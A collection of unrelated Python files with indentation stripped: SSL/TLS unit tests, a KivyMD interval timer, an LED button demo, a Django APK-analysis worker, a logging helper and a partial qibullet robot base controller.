# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
main.py
|
from kivymd.app import MDApp
from kivymd.uix.label import MDLabel
from kivy.lang.builder import Builder
from kivy.properties import StringProperty, BooleanProperty, NumericProperty, ObjectProperty
import threading
import time
import datetime
from kivy.core.window import Window
from playsound import playsound
Window.size = (960, 720)
class TimerApp(MDApp):
pause_time = StringProperty('')
running_time = StringProperty('')
current_running_time = NumericProperty(0)
current_pause_time = NumericProperty(0)
how_long_to_work = NumericProperty(0)
how_long_to_pause = NumericProperty(0)
def __init__(self, **kwargs):
self.current_running_time = 0
self.current_pause_time = 0
self.in_work = True
self.in_pause = False
super().__init__(**kwargs)
def build(self):
self.how_long_to_work = self.root.ids.work_spinner.value
self.how_long_to_pause = self.root.ids.pause_spinner.value
self.pause_time = str(datetime.timedelta(seconds=self.how_long_to_pause*60))
self.running_time = str(datetime.timedelta(seconds=self.how_long_to_work*60))
self.running = False
app = Builder.load_file('timer.kv')
return app
def start(self):
def run_thread():
while self.running:
if self.current_running_time > 0:
self.current_running_time-=1
if self.current_running_time == 0:
playsound('finish_work.wav')
elif self.current_pause_time > 0:
self.current_pause_time-=1
if self.current_pause_time == 0:
playsound('finish_pause.wav')
else:
self.current_running_time = self.how_long_to_work
self.current_pause_time = self.how_long_to_pause
self.running_time = str(datetime.timedelta(seconds=self.current_running_time))
self.pause_time = str(datetime.timedelta(seconds=self.current_pause_time))
time.sleep(1)
self.running = True
thread = threading.Thread(target=run_thread)
thread.start()
def stop(self):
self.running=False
def reset(self):
self.running=False
self.current_running_time = self.how_long_to_work*60
self.current_pause_time = self.how_long_to_pause*60
self.running_time = str(datetime.timedelta(seconds=self.current_running_time))
self.pause_time = str(datetime.timedelta(seconds=self.current_pause_time))
def set_running_time(self, value):
self.running_time = str(datetime.timedelta(seconds=value*60))
self.how_long_to_work = int(value*60)
self.current_running_time = self.how_long_to_work
def set_pause_time(self, value):
self.pause_time = str(datetime.timedelta(seconds=value*60))
self.how_long_to_pause = int(value*60)
self.current_pause_time = self.how_long_to_pause
TimerApp().run()
|
threaded-button-demo.py
|
#!/usr/bin/env python3
"""UrsaLeo LEDdebug threaded button demo
Toggle LED6 while capturing button presses on SW1 & SW2
Press CTR+C to exit"""
import time
import threading
try:
from LEDdebug import LEDdebug
except ImportError:
try:
import sys
import os
sys.path.append("..")
sys.path.append(os.path.join(os.path.dirname(__file__), '..',
'LEDdebug'))
from LEDdebug import LEDdebug
except ImportError:
print('LEDdebug import failed')
exit(0)
def button_pressed(device, button):
""" Callback function
Toggle LEDs when buttons are pressed"""
if button == 1: # Button 1
device.set_led(1, not device.get_led_state(1))
else: # Button 2
device.set_led(2, not device.get_led_state(2))
def interrupt(device):
""" Interrupt function
Trigger callback function if SW1 or SW2 are pressed"""
while True:
button = device.get_button()
if button: # Button SW1 or SW2 pressed
time.sleep(0.5) # Debounce
button_pressed(device, button)
def main():
# Create device
device = LEDdebug()
# Detect button presses in background
timer = threading.Thread(target=interrupt, args=[device])
timer.daemon = True
timer.start()
while True:
try:
# Toggle LED6 in forground
# Other processes can run here
device.set_led(6, not device.get_led_state(6))
time.sleep(1)
except KeyboardInterrupt:
# Turn the lights off when leaving!
device.set_leds(0)
exit(0)
if __name__ == '__main__':
main()
|
threads.py
|
import os
import datetime
import subprocess
import zipfile
from analyze.models import Project, Manifest, Avscan
from threading import Thread
import tools.axmlparserpy.apk as ApkParser
from apksa import settings
def get_file_path(path):
directory = os.path.join(settings.MEDIA_ROOT, path)
return directory
def get_tool_path(path):
directory = os.path.join(settings.TOOLS_DIR, path)
return directory
def project_thread_manager():
project = Project.objects.order_by('-id').filter(status=1).first()
if project is not None and (
datetime.datetime.strptime(project.time, '%Y/%m/%d %H:%M:%S') + datetime.timedelta(hours=1)) \
< datetime.datetime.now():
project_thread_create(project)
if project is None:
project = Project.objects.order_by('-id').filter(status=0).first()
if project is not None:
project_thread_create(project)
def project_thread_create(project):
t = Thread(target=do_tools, args=(project,))
t.start()
def do_tools(project):
unzip_tool(project)
apk_tool(project)
parse_manifest(project)
avscan_tool(project)
def unzip_tool(project):
project.status = 1
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
path = get_file_path(project.file.name)
zip_ref = zipfile.ZipFile(path, 'r')
save_path = path.rsplit(".", 1)[0] + "-unzipped"
zip_ref.extractall(save_path)
zip_ref.close()
def apk_tool(project):
project.status = 2
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
path = get_file_path(project.file.name)
save_path = path.rsplit(".", 1)[0]
tool_path = get_tool_path('apktool/apktool.jar')
subprocess.Popen(['java', '-jar', tool_path, 'd', path, '-o', save_path, '-f'], stdout=subprocess.PIPE)
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
def parse_manifest(project):
manifest = Manifest()
manifest.project = project
path = get_file_path(project.file.name)
parsed_apk = ApkParser.APK(path)
manifest.activities = parsed_apk.get_activities()
manifest.receivers = parsed_apk.get_receivers()
manifest.services = parsed_apk.get_services()
manifest.uses_permission = parsed_apk.get_permissions()
manifest.version_code = parsed_apk.get_androidversion_code()
manifest.version_name = parsed_apk.get_androidversion_name()
manifest.libraries = parsed_apk.get_libraries()
manifest.providers = parsed_apk.get_providers()
manifest.min_sdk = parsed_apk.get_min_sdk_version()
manifest.target_sdk = parsed_apk.get_target_sdk_version()
manifest.save()
def avscan_tool(project):
project.status = 3
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
path = get_file_path(project.file.name)
tool_path = get_tool_path('plagueScanner/plaguescanner.py')
proc = subprocess.Popen(['python3', tool_path, path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = proc.communicate()[0].strip().decode('utf-8')
avscan = Avscan()
avscan.project = project
avscan.clamav = ""
avscan.bitdefender = output
avscan.esetnod32 = ""
avscan.save()
project.status = 4
project.time = datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
project.save()
|
logger.py
|
#!/usr/bin/env python
# Copyright 2013, Institute for Bioninformatics and Evolutionary Studies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import logging
import multiprocessing
def setup(logfile=None, loglevel=logging.INFO):
# Set up a multiprocessing logger to hopefully log from all N workers in a
# safe and simultaneous fashion:
logger = multiprocessing.get_logger()
logger.setLevel(loglevel)
log_handler = logging.StreamHandler(sys.stdout)
log_handler.setFormatter(logging.Formatter(
'[%(asctime)s %(levelname)s %(process)s] %(message)s'))
log_handler.setLevel(loglevel) # Here's where
logger.addHandler(log_handler)
def info(message):
logger = multiprocessing.get_logger()
logger.info("%s" % (message))
def error(message):
logger = multiprocessing.get_logger()
logger.error("%s" % (message))
def debug(message):
logger = multiprocessing.get_logger()
logger.debug("%s" % (message))
def warn(message):
logger = multiprocessing.get_logger()
logger.warn("%s" % (message))
# From:
# http://stackoverflow.com/questions/641420/how-should-i-log-while-using-
# multiprocessing-in-python/894284#894284
# Modified for StreamHandler (instead of RotatingFileHandler)
#from logging.handlers import RotatingFileHandler
#from logging.handlers import StreamHandler
# import multiprocessing, threading, logging, sys, traceback
# class MultiProcessingLog(logging.Handler):
# def __init__(self, name, mode, maxsize, rotate):
# logging.Handler.__init__(self)
# #self._handler = RotatingFileHandler(name, mode, maxsize, rotate)
# self._handler = logging.StreamHandler(sys.stdout)
# self.queue = multiprocessing.Queue(-1)
# t = threading.Thread(target=self.receive)
# t.daemon = True
# t.start()
# def setFormatter(self, fmt='[%(asctime)s %(levelname)s %(process)s] %(message)s'):
# logging.Handler.setFormatter(self, fmt)
# self._handler.setFormatter(fmt)
# def receive(self):
# while True:
# try:
# record = self.queue.get()
# self._handler.emit(record)
# except (KeyboardInterrupt, SystemExit):
# raise
# except EOFError:
# break
# except:
# traceback.print_exc(file=sys.stderr)
# def send(self, s):
# self.queue.put_nowait(s)
# def _format_record(self, record):
# # ensure that exc_info and args
# # have been stringified. Removes any chance of
# # unpickleable things inside and possibly reduces
# # message size sent over the pipe
# if record.args:
# record.msg = record.msg % record.args
# record.args = None
# if record.exc_info:
# dummy = self.format(record)
# record.exc_info = None
# return record
# def emit(self, record):
# try:
# s = self._format_record(record)
# self.send(s)
# except (KeyboardInterrupt, SystemExit):
# raise
# except:
# self.handleError(record)
# def close(self):
# self._handler.close()
# logging.Handler.close(self)
|
snippet.py
|
from multiprocessing import Process
from django.core import serializers
from django.core.management import call_command
from StringIO import StringIO
def dump_database():
sio = StringIO()
call_command('dumpdata', stdout=sio, natural=True)
return sio.getvalue()
def call_command_with_db(dbdump, *args, **kwargs):
objects = serializers.deserialize('json', dbdump)
for obj in objects:
obj.save()
return call_command(*args, **kwargs)
def do_something():
dbdump = dump_database()
process = Process(target=call_command_with_db, args=(dbdump, 'runserver',))
process.start()
|
base_controller.py
|
#!/usr/bin/env python
# coding: utf-8
import time
import atexit
import weakref
import pybullet
import threading
from qibullet.tools import *
class BaseController(object):
"""
Class describing a robot base controller
"""
_instances = set()
FRAME_WORLD = 1
FRAME_ROBOT = 2
def __init__(self, robot_model, physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
physicsClientId - The id of the simulated instance in which the
robot will be controlled
"""
self.robot_model = robot_model
self.physics_client = physicsClientId
self.linear_velocity = 0
self.angular_velocity = 0
self.linear_acceleration = 0
self.angular_acceleration = 0
self.control_process = threading.Thread(target=None)
self.frame = BaseController.FRAME_ROBOT
self.pose_init = {}
self.pose_goal = {}
self._instances.add(weakref.ref(self))
self._controller_termination = False
atexit.register(self._terminateController)
@classmethod
def _getInstances(cls):
"""
INTERNAL CLASSMETHOD, get all of the BaseController (and daughters)
instances
"""
dead = set()
for ref in cls._instances:
obj = ref()
if obj is not None:
yield obj
else:
dead.add(ref)
cls._instances -= dead
def _setGoal(self, x, y, theta, frame):
"""
INTERNAL METHOD, set the position of the goal to a specific frame.
Parameters:
x - position of the goal on the x axis, in meters
y - position of the goal on the y axis, in meters
theta - orientation of the goal around the z axis, in radians
frame - The frame in which the goal is expressed: FRAME_WORLD = 1,
FRAME_ROBOT = 2
"""
self.goal = [x, y, theta]
self.frame = frame
def _updateGoal(self):
"""
INTERNAL METHOD, update the position of the goal.
"""
# get actual position in frame world
actual_pos, actual_orn = pybullet.getBasePositionAndOrientation(
self.robot_model,
physicsClientId=self.physics_client)
x, y, theta = self.goal
# pose x, y, z
pose_requested = [x, y, 0]
# orientation requested (euler)
orn_requested = [0, 0, theta]
# if we are in frame robot express the position in the frame world
if self.frame == BaseController.FRAME_ROBOT:
orn_euler = pybullet.getEulerFromQuaternion(actual_orn)
pose_requested = [
pose_requested[0] * math.cos(orn_euler[2])
- pose_requested[1] * math.sin(orn_euler[2])
+ actual_pos[0],
pose_requested[0] * math.sin(orn_euler[2])
+ pose_requested[1] * math.cos(orn_euler[2])
+ actual_pos[1],
0]
orn_requested = [
orn_euler[0],
orn_euler[1],
orn_euler[2] + theta]
self.pose_goal["position"] = pose_requested
self.pose_goal["orientation"] = orn_requested
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
self.linear_velocity = linear_velocity
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
self.angular_velocity = angular_velocity
def _setLinearAcceleration(self, linear_acceleration):
"""
INTERNAL METHOD, set the linear acceleration.
Parameter:
linear_acceleration : The linear acceleration value in m/s^2
"""
self.linear_acceleration = linear_acceleration
def _setAngularAcceleration(self, angular_acceleration):
"""
INTERNAL METHOD, set the angular acceleration.
Parameter:
angular_acceleration : The angular acceleration value in rad/s^2
"""
self.angular_acceleration = angular_acceleration
def _terminateController(self):
"""
INTERNAL METHOD, can be called to terminate an asynchronous controller.
Should only be used when killing the simulation
"""
self._controller_termination = True
if self.control_process.isAlive():
self.control_process.join()
class PepperBaseController(BaseController):
"""
Class describing a Pepper base controller
"""
MAX_LINEAR_VELOCITY = 0.55
MIN_LINEAR_VELOCITY = 0.1
MAX_ANGULAR_VELOCITY = 2.0
MIN_ANGULAR_VELOCITY = 0.3
MAX_LINEAR_ACCELERATION = 0.55
MIN_LINEAR_ACCELERATION = 0.1
MAX_ANGULAR_ACCELERATION = 3.0
MIN_ANGULAR_ACCELERATION = 0.1
def __init__(
self,
robot_model,
speed,
acceleration,
motion_constraint,
physicsClientId=0):
"""
Constructor
Parameters:
robot_model - the pybullet model of the robot
speed - list containing the linear velocity and the angular
velocity values, in m/s
acceleration - list containing the linear acceleration and angular
acceleration values, in m/s^2
motion_constraint - the pybullet motion constraint applied on the
robot
physicsClientId - The id of the simulated instance in which Pepper
will be controlled
"""
BaseController.__init__(
self,
robot_model,
physicsClientId=physicsClientId)
# Set the different speeds and accelerations
self.setLinearVelocity(speed[0])
self._setAngularVelocity(speed[1])
self._setLinearAcceleration(acceleration[0])
self._setAngularAcceleration(acceleration[1])
# force applied in the movement
self.force = 100
# The robot will stop the movement with a precisio of 0.01 m and 0.02
# rads
self.linear_threshold = 0.01
self.angular_threshold = 0.02
self.motion_constraint = motion_constraint
def setLinearVelocity(self, linear_velocity):
"""
Set the linear velocity.
Parameter:
linear_velocity : The linear velocity value in m/s
"""
if linear_velocity > PepperBaseController.MAX_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MAX_LINEAR_VELOCITY
elif linear_velocity < PepperBaseController.MIN_LINEAR_VELOCITY:
linear_velocity = PepperBaseController.MIN_LINEAR_VELOCITY
BaseController.setLinearVelocity(self, linear_velocity)
def _setAngularVelocity(self, angular_velocity):
"""
INTERNAL METHOD, set the angular velocity.
Parameter:
angular_velocity : The angular velocity value in rad/s
"""
if angular_velocity > PepperBaseController.MAX_ANGULAR_VELOCITY:
